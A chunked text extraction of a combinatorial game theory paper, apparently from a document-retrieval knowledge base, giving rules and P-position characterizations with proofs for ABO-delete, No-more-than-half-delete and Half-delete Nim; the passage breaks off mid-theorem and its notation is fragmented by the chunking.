+ page_content=' The player performs the following two operations in succession on his/her turn.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
83
+ page_content=' Selects n − 1 heaps and deletes them.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
84
+ page_content=' Splits the remaining 1 heap into n heaps.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
85
+ page_content=' The set of all positions in ABO-delete Nim is Gn = {⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
86
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
87
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
88
+ page_content=' , zn⟩ | z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
89
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
90
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
91
+ page_content=' , zn ∈ N}.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
92
+ page_content=' If n = 2, then the ruleset is the same as VDN.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
93
+ page_content=' Therefore, ABO-delete Nim can be considered as a generalization of VDN.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
94
+ page_content=' From Defini- tion 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
95
+ page_content='1, the set of terminal positions of ABO-delete Nim is {⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
96
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
97
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
98
+ page_content=' , zn⟩ | 1 ≤ z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
99
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
100
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
101
+ page_content=' , zn ≤ n − 1}.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
102
+ page_content=' 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
103
+ page_content='2 Characterizing positions of ABO-delete Nim Theorem 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
104
+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
105
+ page_content=' All-but-one-delete Nim position ⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
106
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
107
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
108
+ page_content=' , zn⟩ is a P-position if and only if (*) for every i, the remainder of zi divided by n(n − 1) is between 1 and n − 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
109
+ page_content=' Note that this theorem generalizes Theorem 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
110
+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
111
+ page_content=' Proof.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
112
+ page_content=' Let Gn = {⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
113
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
114
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
115
+ page_content=' , zn⟩ | z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
116
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
117
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
118
+ page_content=' , zn ∈ N}, P be the subset of Gn, which satisfies (*), and N = Gn \\P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
119
+ page_content=' Obviously, P contains the terminal positions of ABO-delete Nim and this game is not a loopy game.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
120
+ page_content=' Therefore, it is enough to show (i) every position in P has no option in P and (ii) every position in N has at least one option in P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
121
+ page_content=' (i) Assume that Z = ⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
122
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
123
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
124
+ page_content=' , zn⟩ ∈ P and Z′ = ⟨z′ 1, z′ 2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
125
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
126
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
127
+ page_content=' , z′ n⟩ is an option of Z.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
128
+ page_content=' Then there exists i such that zi = z′ 1 +z′ 2 +· · · +z′ n.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
129
+ page_content=' Therefore, from (*), the reminder of z′ 1 + z′ 2 + · · · + z′ n divided by n(n − 1) is larger than 0 and less than n.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
130
+ page_content=' On the other hand, if z′ 1, z′ 2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
131
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
132
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
133
+ page_content=' , z′ n satisfies (*), then the sum of reminders of z′ 1, z′ 2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
134
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
135
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
136
+ page_content=' , z′ n is between n and n(n − 1), which is a contradiction.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
137
+ page_content=' Thus, Z′ ̸∈ P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
138
+ page_content=' (ii) Assume that Z = ⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
139
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
140
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
141
+ page_content=' , zn⟩ ∈ N.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
142
+ page_content=' Then, there exists zi whose reminder divided by n(n − 1) is larger than or equal to n (Here, we say the reminder is n(n−1) if zi can be divided by n(n−1)).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
143
+ page_content=' By removing all heaps except for this heap and splitting this heap into n heaps, one can have a position in P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
144
+ page_content=' How to split the heap into n heaps at the last of the proof will be pre- sented in Lemma 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
145
+ page_content='5(2).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
146
+ page_content=' 4 4 No-more-than-half-delete Nim Next, we introduce No-more-than-half-delete Nim or NMTH-delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
147
+ page_content=' In this ruleset, the player removes no more than half heaps of all heaps in a move.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
148
+ page_content=' 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
149
+ page_content='1 The rule of NMTH-delete Nim Definition 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
150
+ page_content='1 (NMTH-delete Nim).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
151
+ page_content=' There are n heaps of tokens.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
152
+ page_content=' The player performs the following two operations in succession on his/her turn.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
153
+ page_content=' Chooses a positive integer k such that k ≤ n 2, selects k heaps, and deletes them.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
154
+ page_content=' Selects k heaps of the remaining n − k heaps and splits each heap into two heaps.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
155
+ page_content=' Note that if n = 2, then the rule is the same as VDN and if n = 3, then the rule is the same as single delete nim with the number of heaps is 3, presented in Section 6.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
156
+ page_content=' 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
157
+ page_content='2 Characterizing positions in NMTH-delete Nim We found following theorem for NMTH-delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
158
+ page_content=' Theorem 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
159
+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
160
+ page_content=' No-more-than-half-delete Nim position ⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
161
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
162
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
163
+ page_content=' , zn⟩ is a P-position if and only if z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
164
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
165
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
166
+ page_content=' , zn satisfy the following condition: (i) v2(z1) = v2(z2) = · · · = v2(zn) = 0 if n is even, (ii) v2(z1) = v2(z2) = · · · = v2(zn) if n is odd.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
167
+ page_content=' For proving this theorem, we prepare following propositions.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
168
+ page_content=' They are trivial, so we omit the proof.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
169
+ page_content=' Proposition 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
170
+ page_content='3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
171
+ page_content=' For x, y, z ∈ N, if x + y = z, then following (i) and (ii) holds.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
172
+ page_content=' (i) If v2(x) = v2(y), then v2(z) > v2(x).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
173
+ page_content=' (ii) If v2(x) ̸= v2(y), then v2(z) = min{v2(x), v2(y)}.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
174
+ page_content=' Proposition 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
175
+ page_content='4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
176
+ page_content=' Assume that z ∈ N and v2(z) > 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
177
+ page_content=' For any nonnegative integer k < v2(z), there exist x, y ∈ N such that x + y = z and v2(x) = v2(y) = k.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
178
+ page_content=' 5 For instance, (x, y) = (z −2k, 2k) satisfies x+y = z and v2(x) = v2(y) = k.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
179
+ page_content=' In the rest of this paper, we say a heap is even (resp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
180
+ page_content=' odd) heap if the number of stones of the heap is an even (resp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
181
+ page_content=' odd) number.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
182
+ page_content=' Proof of Theorem 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
183
+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
184
+ page_content=' Let Pe be the set of positions in which every heap is an odd heap and Ne be the set of positions in which at least one heap is an even heap.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
185
+ page_content=' We also let Po be the set of positions such that every 2-adic valuation of the size of a heap is the same number and No be the set of positions with several different 2-adic valuations of the size of a heap.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
186
+ page_content=' (i) Assume that n is an even number.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
187
+ page_content=' Since there are one even heap and one odd heap after an odd heap is split, a position in Pe has no option in Pe.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
188
+ page_content=' Next, consider a position in Ne.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
189
+ page_content=' If the number of even heaps is larger than or equal to n 2 , then by deleting heaps other than n 2 even heaps and splitting the remaining even heaps into odd heaps, one can obtain a position in Pe.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
190
+ page_content=' If there are less than n 2 even heaps, then by deleting the same number of odd heaps as even heaps and splitting all even heaps into odd heaps, one can obtain a position in Pe.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
191
+ page_content=' (ii) Assume that n is an odd number.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
192
+ page_content=' Then, after one move, at least one heap remains undeleted and unsplit.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
193
+ page_content=' From the contraposition of proposition 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
194
+ page_content='3, if one heap is split, then at least one 2-adic valuation of the heaps is differ from 2-adic valuation of the original heap.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
195
+ page_content=' Therefore, every position in Po has no option in Po.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
196
+ page_content=' Next, in position ⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
197
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
198
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
199
+ page_content=' , zn⟩ ∈ No, assume that v2(z1) ≤ v2(z2) ≤ · · · ≤ v2(zn) and v2(z1) ̸= v2(zn) and we show that from this position one can obtain a position in Po in a single move.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
200
+ page_content=' If the number of j such that v2(z1) < v2(zj) is less than or equal to n−1 2 , then from Proposition 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
201
+ page_content='4, one can split every heap whose 2-adic valuation is larger than v2(z1) into two heaps whose 2-adic valuations are v2(z1).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
202
+ page_content=' For the other cases, one can split n−1 2 heaps whose 2-adic valuations are larger than v2(z1) into n − 1 heaps whose 2-adic valuations are v2(z1).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
203
+ page_content=' 5 Half-delete Nim In this section, we introduce Half-delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
204
+ page_content=' In this ruleset, differ from NMTH-delete nim, the player removes just half heaps of all heaps in a move, so the number of heaps in this ruleset must be an even number.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
205
+ page_content=' We also introduce a generalization of this ruleset.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
206
+ page_content=' 6 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
207
+ page_content='1 The rule of Half-delete Nim Definition 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
208
+ page_content='1 (Half-delete Nim).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
209
+ page_content=' There are n (= 2m) heaps of tokens.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
210
+ page_content=' The player performs the following two operations in succession on his/her turn.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
211
+ page_content=' Selects m heaps and deletes them.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
212
+ page_content=' Splits each of the remaining m heaps into two heaps.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
213
+ page_content=' In particular, if n = 2, this game is the same as VDN.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
214
+ page_content=' 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
215
+ page_content='2 Characterizing positions in Half-delete Nim Theorem 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
216
+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
217
+ page_content=' Let Z = ⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
218
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
219
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
220
+ page_content=' , z2m⟩ be a Half-delete Nim position, where each zi is the number of tokens and zi ≤ zi+1 for any i.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
221
+ page_content=' Let 2s be the smallest power of 2 greater than zm+1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
222
+ page_content=' Then Z is a P-position if and only if z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
223
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
224
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
225
+ page_content=' , z2m satisfy both of the following two conditions: (a) all z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
226
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
227
